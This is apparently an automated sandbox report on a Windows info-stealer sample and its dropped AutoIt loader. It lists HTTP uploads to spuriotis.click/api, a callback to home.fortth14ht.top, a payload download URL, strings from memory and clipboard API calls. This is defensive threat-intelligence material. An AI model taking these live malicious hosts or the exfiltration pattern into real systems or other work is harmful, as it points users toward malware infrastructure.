Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FIHNBRZDAAYIUNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1205Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=10Z7J3JV28FW6XXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571886Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: spuriotis.click

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00ADD889 InternetReadFile,SetEvent,GetLastError,SetEvent,

14_2_00ADD889

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn
Source: global traffic	DNS traffic detected: DNS query: home.fortth14ht.top
Source: global traffic	DNS traffic detected: DNS query: spuriotis.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:56:58 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:57:00 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.css
Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.jpg
Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Set-up.exe.0.dr	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
Source: Set-up.exe, 00000003.00000003.2603485994.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001712000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603940005.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.000000000170E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603578861.0000000001709000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2606819261.0000000000AD9000.00000004.00000001.01000000.00000008.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001713000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
Source: Set-up.exe, Set-up.exe, 00000003.00000003.2603485994.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604040691.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001717000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
Source: Set-up.exe, 00000003.00000003.2603485994.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604040691.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001717000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0798
Source: Set-up.exe, 00000003.00000003.2603485994.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001712000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603940005.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.000000000170E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603578861.0000000001709000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001713000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003ff::3
Source: Set-up.exe, 00000003.00000002.2606819261.0000000000AD9000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
Source: Set-up.exe, 00000003.00000003.2603485994.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001712000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603940005.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.000000000170E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603578861.0000000001709000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001713000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse
Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000002.00000000.2344750367.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007A89000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://timestamp.digicert.com0
Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000000.2417281076.0000000000B35000.00000002.00000001.01000000.0000000A.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696506299400400001.2&ci=1696506299033.
Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696506299400400001.1&ci=1696506299033.12791&cta
Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ip
Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ipbefore
Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbmfQq%2B4pbW4pbWfpbX7ReNxR3UIG8zInwYIFIVs9e
Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://razaseoexpertinbd.com/Assaac.exe
Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/
Source: Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/&
Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/.
Source: Climb.com, 0000000E.00000002.3576789181.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000002.3576614656.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/api
Source: Climb.com, 0000000E.00000002.3576614656.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/apik
Source: Climb.com, 0000000E.00000002.3576789181.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/apis
Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/er
Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/es&
Source: Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click:443/api
Source: Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click:443/apiion.txtPK
Source: Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_cd61a4703a8613be887576f2bd084bcc6f4756dccdbe5062
Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Fingers.11.dr, PasoCattle.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: Climb.com, 0000000E.00000003.2690876371.0000000003B51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.5iSPD7jwkDnW
Source: Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.3UfcDFx2ZSAZ
Source: Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49728 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

2_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ADF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		14_2_00ADF7C7
